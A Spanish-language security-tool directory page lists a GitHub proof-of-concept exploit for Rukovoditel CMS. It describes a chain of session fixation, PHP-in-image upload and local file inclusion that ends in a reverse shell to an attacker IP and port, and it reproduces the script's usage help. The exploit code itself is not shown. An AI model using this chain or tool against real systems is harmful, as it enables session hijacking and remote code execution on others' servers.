Skip to content
KitploitKITPLOIT
HerramientasBlog
Log in
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/danyx07/poc-rce-rukovoditel
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de Penetración
GitHubdanyx07/poc-rce-rukovoditel

PoC-RCE-Rukovoditel

Prueba de concepto para CVE-2020-11819 y CVE-2020-15946

Ver Repositorio
hace 5 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

PoC-RCE-Rukovoditel

Prueba de concepto para CVE-2020-11819 y CVE-2020-15946. Probado en Rukovoditel 2.4.x, 2.5.x y 2.6.1

Descripción:

Este exploit tiene dos modos de ejecución, usando la vulnerabilidad de fijación de sesión (CVE-2020-15946) o usando las credenciales de acceso de cualquier cuenta bajo cualquier perfil. Con la opción --type L, este script creará un enlace malicioso. Si la víctima accede al enlace en un navegador, se establecerá un identificador de sesión arbitrario que se usará para robar su sesión después de subir una imagen con contenido PHP en su foto de perfil, y luego usar la inclusión de archivo local (CVE-2020-11819) para obtener una bonita reverse shell; o, con las opciones --type C -u -p puedes proporcionar credenciales, cargar la imagen con contenido PHP y usar la inclusión de archivo local (CVE-2020-11819) para lograr la ejecución de código.

Consejo: recuerda verificar si el módulo de registro está habilitado ;)

Uso

exploit.py -t -a L --ip attacker IP --port attacker port [options] exploit.py -t -a C -u -p --ip attacker IP --port attacker port [options]

RCE post-autenticación para rukovoditel, versión del script 1.0

argumentos opcionales:
-h, --help muestra este mensaje de ayuda y sale
-t URL, --target URL URL/Ruta completa al CMS Rukovoditel http://url/path/to/cms/
-u USER, --user USER Nombre de usuario para autenticación
-p PASSWORD, --password PASSWORD Contraseña para autenticación
-a TYPE, --type TYPE Usa -a L para generar el enlace y robar la sesión o usa -a C si tienes credenciales de acceso a la aplicación web
--ip IP_ATTACKER IP del atacante para la reverse shell!
--port PORT_ATTACKER Puerto para la conexión de reverse shell
--proxy PROXY Configurar proxy http para depuración http://127.0.0.1:8080

Descargar herramienta